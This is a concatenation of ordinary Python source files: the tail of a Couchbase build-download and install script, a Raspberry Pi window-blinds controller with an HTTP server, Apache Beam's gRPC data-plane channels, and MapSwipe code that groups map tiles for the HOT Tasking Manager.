params["timeout"] = int(value)
if key == "storage_mode":
params["storage_mode"] = value
if key == "disable_consistency":
params["disable_consistency"] = True if value.lower() == "true" else False
if key == "skip_local_download":
params["skip_local_download"] = False if value.lower() == "false" else True
if key == "enable_ipv6":
if value.lower() == "true":
for server in params["servers"]:
if re.match('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', server.ip):
print_result_and_exit(
"Cannot enable IPv6 on an IPv4 machine: {0}. Please run without enable_ipv6=True.".format(
server.ip))
params["enable_ipv6"] = True
if key == "fts_quota" and int(value) >= 256:
params["fts_quota"] = int(value)
if key == "fts_query_limit" and int(value) > 0:
params["fts_query_limit"] = int(value)
if key == "variant":
params["variant"] = value
if not params["version"] and not params["url"]:
print_result_and_exit("Need valid build version or url to proceed")
return params
def __check_servers_reachable():
reachable = []
unreachable = []
for server in params["servers"]:
try:
RemoteMachineShellConnection(server, exit_on_failure=False)
reachable.append(server.ip)
except Exception as e:
log.error(e)
unreachable.append(server.ip)
if len(unreachable) > 0:
log.info("-" * 100)
for _ in unreachable:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in reachable:
# Marking this node as "completed" so it is not moved to failedInstall state
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
sys.exit(1)
def _params_validation():
__check_servers_reachable()
# Create 1 NodeHelper instance per VM
for server in params["servers"]:
NodeHelpers.append(NodeHelper(server))
# Version compatibility
node_os = []
for node in NodeHelpers:
if node.get_os() not in install_constants.SUPPORTED_OS:
print_result_and_exit("Install on {0} OS is not supported".format(node.get_os()))
else:
node_os.append(node.get_os())
if len(set(node_os)) == 1:
params["all_nodes_same_os"] = True
_check_version_compatibility(NodeHelpers[0])
else:
for node in NodeHelpers:
_check_version_compatibility(node)
# TODO: check if cb version is compatible with os
def _check_version_compatibility(node):
pass
def pre_install_steps():
if "install" in params["install_tasks"]:
if params["url"] is not None:
if NodeHelpers[0].shell.is_url_live(params["url"]):
params["all_nodes_same_os"] = True
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = params["url"]
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
else:
print_result_and_exit("URL {0} is not live. Exiting.".format(params["url"]))
else:
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = __get_build_url(node, build_binary)
if not build_url:
print_result_and_exit(
"Build is not present in latestbuilds or release repos, please check {0}".format(build_binary))
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
_download_build()
def _execute_local(command, timeout):
# -- Uncomment the below 2 lines for python 3
# process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait(timeout)
# process.communicate()[0].strip()
# -- python 2
returncode = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait()
return returncode
def __copy_thread(src_path, dest_path, node):
logging.info("Copying %s to %s" % (src_path, node.ip))
node.shell.copy_file_local_to_remote(src_path, dest_path)
logging.info("Done copying build to %s.", node.ip)
def _copy_to_nodes(src_path, dest_path):
copy_threads = []
for node in NodeHelpers:
copy_to_node = threading.Thread(target=__copy_thread, args=(src_path, dest_path, node))
copy_threads.append(copy_to_node)
copy_to_node.start()
for thread in copy_threads:
thread.join()
def __get_build_url(node, build_binary):
if params["enable_ipv6"]:
ipv6_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_FQDN_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(ipv6_url, exit_if_not_live=False):
return ipv6_url
else:
latestbuilds_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
release_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_RELEASE_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(latestbuilds_url, exit_if_not_live=False):
return latestbuilds_url
elif node.shell.is_url_live(release_url, exit_if_not_live=False):
return release_url
return None
def _download_build():
if params["all_nodes_same_os"] and not params["skip_local_download"]:
check_and_retry_download_binary_local(NodeHelpers[0])
_copy_to_nodes(NodeHelpers[0].build.path, NodeHelpers[0].build.path)
for node in NodeHelpers:
if not check_file_exists(node, node.build.path) or not check_file_size(node):
print_result_and_exit("Unable to copy build to {}, exiting".format(node.build.path), install_started=False)
else:
for node in NodeHelpers:
build_url = node.build.url
filepath = node.build.path
cmd = install_constants.DOWNLOAD_CMD[node.info.deliverable_type]
if "curl" in cmd:
cmd = cmd.format(build_url, filepath,
install_constants.WAIT_TIMES[node.info.deliverable_type]
["download_binary"])
elif "wget" in cmd:
cmd = cmd.format(__get_download_dir(node), build_url)
logging.info("Downloading build binary to {0}:{1}..".format(node.ip, filepath))
check_and_retry_download_binary(cmd, node)
log.debug("Done downloading build binary")
def check_and_retry_download_binary_local(node):
log.info("Downloading build binary to {0}..".format(node.build.path))
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type][
"download_binary"]
cmd = install_constants.WGET_CMD.format(__get_download_dir(node), node.build.url)
start_time = time.time()
while time.time() < start_time + timeout:
try:
exit_code = _execute_local(cmd, timeout)
if exit_code == 0 and os.path.exists(node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warn("Unable to download build: {0}, retrying..".format(e.message))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout,
node.build.path), install_started=False)
def check_file_exists(node, filepath):
output, _ = node.shell.execute_command("ls -lh {0}".format(filepath), debug=params["debug_logs"])
for line in output:
if line.find('No such file or directory') == -1:
return True
return False
def get_remote_build_size(node):
output, _ = node.shell.execute_command(install_constants.REMOTE_BUILD_SIZE_CMD.format(node.build.url))
remote_build_size = int(output[0].strip().split(" ")[1])
return remote_build_size
def get_local_build_size(node):
output, _ = node.shell.execute_command(install_constants.LOCAL_BUILD_SIZE_CMD.format(__get_download_dir(node), __get_build_binary_name(node)))
local_build_size = int(output[0].strip().split(" ")[0])
return local_build_size
def check_file_size(node):
try:
expected_size = get_remote_build_size(node)
actual_size = get_local_build_size(node)
return expected_size == actual_size
except Exception:
return False
def check_and_retry_download_binary(cmd, node):
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type]["download_binary"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
_, _, download_exit_code = node.shell.execute_command(cmd, debug=params["debug_logs"], get_exit_code=True)
if download_exit_code == 0 and check_file_size(node) and check_file_exists(node, node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warning("Unable to download build: {0}, retrying..".format(e))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout, node.ip), install_started=False)
def __get_download_dir(node):
os = node.get_os()
if os in install_constants.LINUX_DISTROS:
if node.shell.nonroot:
return install_constants.NON_ROOT_DOWNLOAD_DIR['LINUX_DISTROS']
else:
return install_constants.DOWNLOAD_DIR["LINUX_DISTROS"]
elif os in install_constants.MACOS_VERSIONS:
return install_constants.DOWNLOAD_DIR["MACOS_VERSIONS"]
elif os in install_constants.WINDOWS_SERVER:
return install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"]
def __get_build_binary_name(node):
# couchbase-server-enterprise-6.5.0-4557-centos7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-suse15.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-rhel8.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-oel7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-amzn2.x86_64.rpm
if node.get_os() in install_constants.X86:
return "{0}-{1}-{2}{3}.{4}.{5}".format(params["cb_edition"],
params["version"],
node.get_os(),
"-" + params["variant"] if "variant" in params else "",
node.info.architecture_type,
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-ubuntu16.04_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-debian8_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-windows_amd64.msi
elif node.get_os() in install_constants.AMD64:
if "windows" in node.get_os():
node.info.deliverable_type = "msi"
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
"amd64",
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-macos_x86_64.dmg
elif node.get_os() in install_constants.MACOS_VERSIONS:
return "{0}_{1}-{2}_{3}-{4}.{5}".format(params["cb_edition"],
params["version"],
"macos",
node.info.architecture_type,
"unnotarized",
node.info.deliverable_type)
|
blinds_control.py
|
# server stuff
# import simple_server as simpleSrvr
from simple_server import *
# motor control stuff
import motor_control as motorCtrl
# blossom control
import blossom_control as blossom
# blossom info
blossom_add = blossom.blossom_add
blossom_blinds = {'raise':'fear2','lower':'sad3','':'yes'}
# GPIO setup
import RPi.GPIO as GPIO
# GPIO 4 (pin 7) goes up
gpio_up = 4
# GPIO 3 (pin 5) goes down
gpio_down = 3
# GPIO 2 (pin 3) commands blossom
gpio_blossom = 2
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpio_up,GPIO.IN)
GPIO.setup(gpio_down,GPIO.IN)
GPIO.setup(gpio_blossom,GPIO.IN)
import firebase_control
from firebase_control import fb as gal9000
# threading
import threading
import SimpleHTTPServer
import SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler
from urlparse import urlparse
port = 8000
class funHandler(BaseHTTPRequestHandler):
# def do_GET(self, function, *args, **kwargs):
def do_GET(self):
print self.path
self.send_response(200)
move_blinds(self.path[1:])
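# Illustrative request mapping (paths are examples): GET /raise calls
# move_blinds('raise') and GET /lower calls move_blinds('lower'); the leading
# '/' is stripped from self.path before dispatching.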
# poll gal9000 firebase
def gal9000_thread():
while(1):
try:
#print str(GPIO.input(gpio_up))+str(GPIO.input(gpio_down))+str(GPIO.input(gpio_blossom))
if (GPIO.input(gpio_up)):
print 'Raising'
move_blinds('raise')
elif (GPIO.input(gpio_down)):
print 'Lowering'
move_blinds('lower')
elif (GPIO.input(gpio_blossom)):
print 'Blossoming'
blossom.cmd_blossom('yes','calm')
except KeyboardInterrupt:
return
# poll blind position
def blind_pos_thread():
while(1):
try:
motor_load = motorCtrl.get_load(1)
print motor_load
blind_state = ''
if (motor_load == 96.5):
blind_state = 'up'
elif(motor_load == -96.5):
blind_state = 'down'
if (blind_state != ''):
gal9000.put('blinds','state',blind_state)
print blind_state
except KeyboardInterrupt:
return
# check and update from firebase
def gal9000_check():
blinds_cmd = gal9000.get('blinds','cmd')
blinds_state = gal9000.get('blinds','state')
blossom_s = gal9000.get('blossom','s')
blossom_idle = gal9000.get('blossom','idle')
# command blossom
blossom.cmd_blossom(blossom_s, blossom_idle)
# move blinds
move_blinds(blinds_cmd)
# erase commands
gal9000.put('blinds','cmd','')
return blinds_state
# move blinds
def move_blinds(cmd):
blossom.cmd_blossom(blossom_blinds[cmd])
blinds_state = ''
if (cmd == 'raise'):
motorCtrl.move_to_limit(1,-1000)
blinds_state = 'up'
# gal9000_put('up')
elif (cmd =='lower'):
motorCtrl.move_to_limit(1,1000)
blinds_state = 'down'
# gal9000_put('down')
elif (cmd == 'stop'):
motorCtrl.move_to_limit(1,0)
return
else:
return
gal9000.put('blinds','state',blinds_state)
# main
if __name__ == "__main__":
try:
# set function handler for http requests
motorHandler = funHandler
# init blinds state
# blinds_state = gal9000_check()
# start threading
t = threading.Thread(target=gal9000_thread)
t.start()
# c = threading.Thread(target=blind_pos_thread)
# c.start()
# start server
httpd = SocketServer.TCPServer(("", port), motorHandler)
httpd.serve_forever()
# catch ctrl-c
except KeyboardInterrupt:
httpd.shutdown()
pass
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import Queue as queue
import threading
import grpc
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
# This module is experimental. No backwards-compatibility guarantees.
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self, close_callback=None):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(object):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def input_elements(self, instruction_id, expected_targets):
"""Returns an iterable of all Element.Data bundles for instruction_id.
This iterable terminates only once the full set of data has been received
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, it should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
The inverse() method returns the other side of an instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None):
for data in self._inputs:
if data.instruction_reference == instruction_id:
yield data
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
def close(self):
self._to_send.put(self._WRITES_FINISHED)
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def input_elements(self, instruction_id, expected_targets):
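# Protocol note (matching output_stream below): an Elements.Data message with
# empty `data` acts as the end-of-stream marker for a target, so a target is
# considered done once such an empty message arrives for it.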
received = self._receiving_queue(instruction_id)
done_targets = []
while len(done_targets) < len(expected_targets):
data = received.get()
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
def output_stream(self, instruction_id, target):
# TODO: Return an output stream that sends data
# to the Runner once a fixed size buffer is full.
# Currently we buffer all the data before sending
# any messages.
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=''))
return ClosableOutputStream(add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=broad-except
logging.exception('Failed to read inputs in the data plane')
raise
finally:
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(object):
"""An abstract factory for creating ``DataChannel``."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self):
self._data_channel_cache = {}
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
grpc_channel = grpc.insecure_channel(
url,
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options=[("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)])
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
tasking_manager_geometries.py
|
import csv
from queue import Queue
import threading
from osgeo import ogr
from mapswipe_workers.definitions import logger
from mapswipe_workers.definitions import DATA_PATH
from mapswipe_workers.utils import tile_functions, geojson_functions
def load_data(project_id: str, csv_file: str) -> list:
"""
This will load the aggregated results csv file into a list of dictionaries.
Subsequent processing currently relies on task_x, task_y, task_z, yes_share, maybe_share and wkt.
"""
project_data = []
with open(csv_file, "r") as f:
reader = csv.reader(f, delimiter=",")
for i, row in enumerate(reader):
if i == 0:
# skip header
continue
# the last row of the csv might contain a comment about data use
if row[0].startswith("#"):
continue
task_id = row[1]
task_x = int(task_id.split("-")[1])
task_y = int(task_id.split("-")[2])
task_z = int(task_id.split("-")[0])
# TODO: Add no_count here and use later
project_data.append(
{
"id": task_id,
"project_id": project_id,
"task_x": task_x,
"task_y": task_y,
"task_z": task_z,
"no_count": int(row[2]),
"yes_count": int(row[3]),
"maybe_count": int(row[4]),
"bad_imagery_count": int(row[5]),
"no_share": float(row[7]),
"yes_share": float(row[8]),
"maybe_share": float(row[9]),
"bad_imagery_share": float(row[10]),
"wkt": tile_functions.geometry_from_tile_coords(
task_x, task_y, task_z
),
}
)
return project_data
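# Note on the expected CSV layout (inferred from the column indices used above,
# not an authoritative spec): column 1 holds the task id in "zoom-x-y" form,
# columns 2-5 hold the no/yes/maybe/bad_imagery counts and columns 7-10 the
# corresponding shares. For example a row like
#   ..., "18-1234-5678", 0, 3, 1, 0, ..., 0.0, 0.75, 0.25, 0.0, ...
# becomes {"task_z": 18, "task_x": 1234, "task_y": 5678, "yes_share": 0.75, ...}.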
def yes_maybe_condition_true(x: dict) -> bool:
"""
The yes/maybe condition is true if more than 35% of users
have classified a tile as 'yes' or 'maybe'.
For small user counts this corresponds to
2 (or more) out of 3, 4 or 5 users.
"""
if x["yes_share"] + x["maybe_share"] > 0.35:
return True
else:
return False
def filter_data(project_data: list) -> list:
"""
Filter results that fulfil the yes_maybe_condition.
"""
# filter yes and maybe
filtered_project_data = [x for x in project_data if yes_maybe_condition_true(x)]
return filtered_project_data
def check_list_sum(x, range_val):
"""
This checks whether a given tile offset belongs to the defined "star"-shaped neighbourhood.
"""
item_sum = abs(x[0]) + abs(x[1])
if item_sum <= range_val:
return True
else:
return False
def get_neighbour_list(neighbourhood_shape: str, neighbourhood_size: int) -> list:
"""
Builds the list of tile offsets that count as neighbours.
This is based on a given search radius (neighbourhood size) and search window shape (neighbourhood shape).
"""
neighbour_list = []
range_val = int(neighbourhood_size / 2)
for i in range(-range_val, range_val + 1):
for j in range(-range_val, range_val + 1):
if i == 0 and j == 0:
pass
else:
neighbour_list.append([i, j])
if neighbourhood_shape == "star":
neighbour_list = [x for x in neighbour_list if check_list_sum(x, range_val)]
return neighbour_list
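# Illustrative sketch (not part of the original module): for the default
# "rectangle" shape with neighbourhood_size=5 the list holds all 24 offsets of
# the 5x5 window around (0, 0) except (0, 0) itself; the "star" shape keeps
# only offsets with |i| + |j| <= 2, i.e.
#   get_neighbour_list("star", 5) == [
#       [-2, 0], [-1, -1], [-1, 0], [-1, 1], [0, -2], [0, -1],
#       [0, 1], [0, 2], [1, -1], [1, 0], [1, 1], [2, 0]]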
def add_group_id_to_neighbours(task_x: int, task_y: int, task_z: int, group_id: int):
"""
Add a group id to all other tiles that are in the neighbourhood of the given tile,
which is defined by task_x, task_y and task_z.
"""
# look for neighbours
for i, j in neighbour_list:
new_task_x = int(task_x) + i
new_task_y = int(task_y) + j
new_task_id = f"{task_z}-{new_task_x}-{new_task_y}"
if new_task_id in yes_results_dict:
yes_results_dict[new_task_id]["my_group_id"] = group_id
def create_duplicates_dict() -> dict:
"""
Check which tasks belong to multiple groups.
This will be used at a later stage to put tasks into distinct groups.
"""
duplicated_groups = {}
for task_id in yes_results_dict.keys():
my_group_id = yes_results_dict[task_id]["my_group_id"]
# check for other results in the neighbourhood
# look for neighbours
for i, j in neighbour_list:
new_task_x = int(yes_results_dict[task_id]["task_x"]) + i
new_task_y = int(yes_results_dict[task_id]["task_y"]) + j
new_task_id = (
f"{yes_results_dict[task_id]['task_z']}-{new_task_x}-{new_task_y}"
)
if new_task_id in yes_results_dict:
neighbours_group_id = yes_results_dict[new_task_id]["my_group_id"]
if neighbours_group_id != my_group_id:
# add the other group to duplicated groups dict
try:
duplicated_groups[my_group_id].add(neighbours_group_id)
except KeyError:
duplicated_groups[my_group_id] = set([neighbours_group_id])
# add my_group_id to other groupd_id in duplicated dict
try:
duplicated_groups[neighbours_group_id].add(my_group_id)
except KeyError:
duplicated_groups[neighbours_group_id] = set([my_group_id])
return duplicated_groups
def remove_duplicates(duplicated_groups: dict):
"""
Remove group ids for tasks which have more than one.
This is to make sure that every task belongs to a single group only.
This distinct group id will be the basis for further geometric processing.
"""
for duplicated_group_id in sorted(duplicated_groups.keys(), reverse=True):
logger.debug(
f"{duplicated_group_id}: {list(duplicated_groups[duplicated_group_id])}"
)
my_duplicated_group_id = duplicated_group_id
for other_group_id in duplicated_groups[duplicated_group_id]:
if other_group_id < my_duplicated_group_id:
my_duplicated_group_id = other_group_id
for task_id in yes_results_dict.keys():
if yes_results_dict[task_id]["my_group_id"] == duplicated_group_id:
yes_results_dict[task_id]["my_group_id"] = my_duplicated_group_id
def split_groups(q):
"""
This function will be executed using threading.
First it checks whether there are still groups pending in the queue.
We are using a clustering algorithm to put tasks together in groups.
Since it is computationally expensive to check which tiles are neighbours,
we split our results into chunks (called groups here).
When a group falls below the defined group size we stop splitting it.
Otherwise, the group will be split into two parts and
both will be added as new groups to our queue.
"""
while not q.empty():
group_id, group_data, group_size = q.get()
logger.debug(f"the group ({group_id}) has {len(group_data)} members")
# find min x, and min y
x_list = []
y_list = []
for result, data in group_data.items():
x_list.append(int(data["task_x"]))
y_list.append(int(data["task_y"]))
min_x = min(x_list)
max_x = max(x_list)
x_width = max_x - min_x
min_y = min(y_list)
max_y = max(y_list)
y_width = max_y - min_y
new_grouped_data = {"a": {}, "b": {}}
if x_width >= y_width:
# first split vertically
for result, data in group_data.items():
# result is in first segment
if int(data["task_x"]) < (min_x + (x_width / 2)):
new_grouped_data["a"][result] = data
else:
new_grouped_data["b"][result] = data
else:
# first split horizontally
for result, data in group_data.items():
# result is in first segment
if int(data["task_y"]) < (min_y + (y_width / 2)):
new_grouped_data["a"][result] = data
else:
new_grouped_data["b"][result] = data
for k in ["a", "b"]:
logger.debug("there are %s results in %s" % (len(new_grouped_data[k]), k))
for result, data in new_grouped_data[k].items():
x_list.append(int(data["task_x"]))
y_list.append(int(data["task_y"]))
min_x = min(x_list)
max_x = max(x_list)
x_width = max_x - min_x
min_y = min(y_list)
max_y = max(y_list)
y_width = max_y - min_y
if len(new_grouped_data[k]) < group_size:
# add this check to avoid large groups with few items
if x_width * y_width > 2 * (
my_neighbourhood_size * my_neighbourhood_size
):
q.put([group_id, new_grouped_data[k], group_size])
else:
split_groups_list.append(new_grouped_data[k])
logger.debug('added group "%s" to split_groups_list' % k)
else:
# add this group to a queue
q.put([group_id, new_grouped_data[k], group_size])
q.task_done()
def create_hot_tm_tasks(
project_id: str,
project_data: list,
group_size: int = 15,
neighbourhood_shape: str = "rectangle",
neighbourhood_size: int = 5,
) -> dict:
"""
This function creates a dictionary of tiles which will form tasks in the HOT Tasking Manager.
It will create a neighbourhood list, which functions as a mask to find tiles that are close to each other.
The function assigns group ids to each tile.
Tiles that received several group ids will be resolved in the next step.
Once each task has a unique group id, the function checks the size (number of tiles) for each group.
Groups that hold too many tiles (too big to map in the Tasking Manager) will be split into smaller groups.
Finally, a dictionary is returned which holds each group as an item.
Each group consists of a limited number of tiles.
"""
# final groups dict will store the groups that are exported
final_groups_dict = {}
highest_group_id = 0
# create a dictionary with all results
global yes_results_dict
yes_results_dict = {}
for result in project_data:
yes_results_dict[result["id"]] = result
logger.info(
"created results dictionary. there are %s results." % len(yes_results_dict)
)
if len(yes_results_dict) < 1:
return final_groups_dict
global neighbour_list
global my_neighbourhood_size
my_neighbourhood_size = neighbourhood_size
neighbour_list = get_neighbour_list(neighbourhood_shape, neighbourhood_size)
logger.info(
"got neighbour list. neighbourhood_shape: %s, neighbourhood_size: %s"
% (neighbourhood_shape, neighbourhood_size)
)
global split_groups_list
split_groups_list = []
# test for neighbours and set group ids
for task_id in sorted(yes_results_dict.keys()):
try:
# this task has already a group id, great.
group_id = yes_results_dict[task_id]["my_group_id"]
except KeyError:
group_id = highest_group_id + 1
highest_group_id += 1
yes_results_dict[task_id]["my_group_id"] = group_id
logger.debug("created new group id")
logger.debug("group id: %s" % group_id)
# check for other results in the neighbourhood and add the group id to them
add_group_id_to_neighbours(
yes_results_dict[task_id]["task_x"],
yes_results_dict[task_id]["task_y"],
yes_results_dict[task_id]["task_z"],
group_id,
)
logger.info("added group ids to yes maybe results dict")
# check if some tasks have different groups from their neighbours
duplicates_dict = create_duplicates_dict()
while len(duplicates_dict) > 0:
remove_duplicates(duplicates_dict)
duplicates_dict = create_duplicates_dict()
logger.debug("there are %s duplicated groups" % len(duplicates_dict))
logger.info("removed all duplicated group ids in yes maybe results dict")
grouped_results_dict = {}
for task_id in yes_results_dict.keys():
group_id = yes_results_dict[task_id]["my_group_id"]
try:
grouped_results_dict[group_id][task_id] = yes_results_dict[task_id]
except KeyError:
grouped_results_dict[group_id] = {}
grouped_results_dict[group_id][task_id] = yes_results_dict[task_id]
logger.info("created dict item for each group")
# reset highest group id since we merged several groups
highest_group_id = max(grouped_results_dict)
logger.debug("new highest group id: %s" % highest_group_id)
q = Queue(maxsize=0)
num_threads = 1
for group_id in grouped_results_dict.keys():
if len(grouped_results_dict[group_id]) < group_size:
final_groups_dict[group_id] = grouped_results_dict[group_id]
else:
group_data = grouped_results_dict[group_id]
# add this group to the queue
q.put([group_id, group_data, group_size])
logger.info("added groups to queue.")
for i in range(num_threads):
worker = threading.Thread(target=split_groups, args=(q,))
worker.start()
q.join()
logger.info("split all groups.")
logger.debug("there are %s split groups" % len(split_groups_list))
# add the split groups to the final groups dict
for group_data in split_groups_list:
new_group_id = highest_group_id + 1
highest_group_id += 1
final_groups_dict[new_group_id] = group_data
logger.info("created %s groups." % len(final_groups_dict))
return final_groups_dict
def dissolve_project_data(project_data):
"""
This function uses the UnionCascaded operation to return a dissolved geometry
from several single-part polygon geometries.
"""
multipolygon_geometry = ogr.Geometry(ogr.wkbMultiPolygon)
for item in project_data:
polygon = ogr.CreateGeometryFromWkt(item["wkt"])
multipolygon_geometry.AddGeometry(polygon)
dissolved_geometry = multipolygon_geometry.UnionCascaded()
return dissolved_geometry
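# Minimal usage sketch (hypothetical WKT values, not data from the pipeline):
#   squares = [{"wkt": "POLYGON ((0 0,1 0,1 1,0 1,0 0))"},
#              {"wkt": "POLYGON ((1 0,2 0,2 1,1 1,1 0))"}]
#   dissolved = dissolve_project_data(squares)
#   dissolved.ExportToWkt()  # the two touching squares merged into one polygon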
def generate_tasking_manager_geometries(project_id: str):
"""
This function runs the workflow to create a GeoJSON file ready to be used in the HOT Tasking Manager.
First, data is loaded from the aggregated results csv file.
Then it filters results for which a defined threshold of yes and maybe classifications has been reached.
We then derive the Tasking Manager geometries, and a dissolved geometry of all filtered results.
Finally, both data sets are saved into GeoJSON files.
"""
raw_data_filename = f"{DATA_PATH}/api/agg_results/agg_results_{project_id}.csv"
